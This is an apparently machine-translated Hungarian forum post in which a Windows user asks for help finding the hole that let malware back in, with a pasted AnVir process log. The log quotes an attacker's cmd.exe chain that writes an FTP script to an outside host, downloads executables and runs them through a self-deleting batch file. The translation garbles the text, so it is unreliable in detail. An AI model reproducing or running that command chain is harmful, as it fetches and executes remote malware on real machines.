Segíts nekem megtalálni a lyukat a rendszerben (szabadalom száma 107989)

Segíts nekem megtalálni a lyukat a rendszer

Körülbelül egy héttel ezelőtt volt fertőzött a vírussal. Jött a számítógép is (én nem indul el semmit). Úgy tűnik, az ügy egy lyuk a rendszer vagy szoftver. Ezután újra a rendszert. Ma ismét találtam a támadás a PC, de idővel a fertőzés megelőzésére. Segítsen megtalálni és patch egy lyuk a rendszerben.

Vágó naplójának AnVir Task Manager:
28/08 00:16:10 wmiprvse.exe 3272 által kezdett svchost.exe C: \ WINDOWS \ system32 \ wbem \ wmiprvse.exe (feltételezve, hogy a szolgáltatást indított "Run szerver feldolgozza DCOM")
28/08 00:16:38 wmiprvse.exe 1740 által kezdett svchost.exe NT AUTHORITY \ SYSTEM C: \ WINDOWS \ system32 \ wbem \ wmiprvse.exe
28/08 00:16:38 msiexec.exe 1080 által kezdett services.exe NT AUTHORITY \ SYSTEM C: \ WINDOWS \ system32 \ msiexec.exe / V
28/08 00:17:46 cmd.exe 3432 által kezdett wmiprvse.exe COMP \ admin C: \ WINDOWS \ system32 \ cmd.exe / d / c md i2393cd i2393del * * / f / s / qecho nyitott yBBDD.to. .jajaca.com> jecho Wmi >> jecho 123 >> jecho mget * .exe >> jecho szia >> jFTP.EXE -i -s: jdel jecho számára %% i in (* .exe) nem indul %% i> D.batecho számára %% i in (* .exe) do %% i >> D.batecho del / f / q% 0% >> D.batD.bat
28/08 00:17:46 ftp.exe 2844 által kezdett cmd.exe COMP \ admin C: \ WINDOWS \ system32 \ ftp.exe -i -s: j
(Tátott szájjal a tűzfalon, hogy indítson panaszok ftp.exe szögezve, és húzza ki a 3G modem foglalat)
28/08 00:18:16 cmd.exe 3432 megszűnik, dolgozott 00:29, 00:00 CPU C: \ WINDOWS \ system32 \ cmd.exe
28/08 00:18:16 ftp.exe 2844 megszűnik, dolgozott 00:29, 00:00 CPU C: \ WINDOWS \ system32 \ ftp.exe
28/08 00:18:56 wmiprvse.exe 3272 megszűnik, dolgozott 02:45, 00:00 CPU C: \ WINDOWS \ system32 \ wbem \ wmiprvse.exe

Belépés ellenőrzése AVZ: